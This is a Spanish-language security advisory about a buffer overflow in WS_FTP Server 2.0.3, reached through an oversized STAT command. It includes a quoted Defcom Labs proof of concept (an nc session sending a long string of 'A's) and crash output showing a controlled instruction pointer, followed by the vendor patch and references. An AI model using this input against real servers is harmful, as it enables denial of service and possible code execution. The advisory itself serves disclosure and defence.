Un atacante puede realizar una petición malintencionada a WS_FTP
Server para conseguir un desbordamiento de buffer.
WS_FTP Server es un servidor FTP que por defecto corre como un
servicio del sistema. Este popular servidor FTP se ejecuta bajo
plataformas Microsoft Windows. El problema en cuestión viene dado
cuando un atacante, previa autenticación, realiza una petición
especialmente malformada mediante comandos FTP. El atacante
procederá a realizar una petición tipo «STAT» seguida de una cadena
de caracteres de aproximadamente 479 bytes, con lo que conseguirá un
ataque DoS sobre el servidor. Si el atacante quisiera pulir aún más
su asalto podría intentar sobrescribir las variables de pila y la
dirección de retorno con lo que podría ejecutar código a nivel
del sistema.
Ejemplo proporcionado por Defcom Labs:
C:\tools\web>nc localhost 21
220-helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
220-Wed Aug 08 19:57:40 2001
220-30 days remaining on evaluation.
220 helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
user ftp
331 Password required
pass ftp
230 user logged in
stat AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0808 19:57:40 (000002e8) 127.0.0.1:1131 connected to 127.0.0.1:21
SetFolder = C:\program\iFtpSvc\helig
SetFolder = C:\program\iFtpSvc\helig\public
SetFolder = C:/program/iFtpSvc/helig
0808 19:57:43 (000002e8) helig S(0) 127.0.0.1 anon-ftp logon success
(A1)
Access violation – code c0000005 (first chance)
eax=000000ea ebx=0067c280 ecx=000000ea edx=00000002
esi=0067c280 edi=00130178
eip=41414141 esp=0104ded4 ebp=41414141 iopl=0
41414141 ?? ???
Para solucionar este problema se deberá actualizar a la versión WS_FTP
Server 2.0.4., es requisito previo a esta actualización, que el
servidor corra sobre una versión 2.x.
ftp://ftp.ipswitch.com/Ipswitch/Product_Support/WS_FTP_Server/ifs204.exe
roman@hispasec.com
Más información:
Ipswitch WS_FTP Server 2.0.3 Buffer Overflow
http://labs.defcom.com/adv/2001/def-2001-31.txt
Upgrade to WS_FTP Server 2.04 from 2.x.
http://www.ipswitch.com/support/WS_FTP-Server/patch-upgrades.html
Deja una respuesta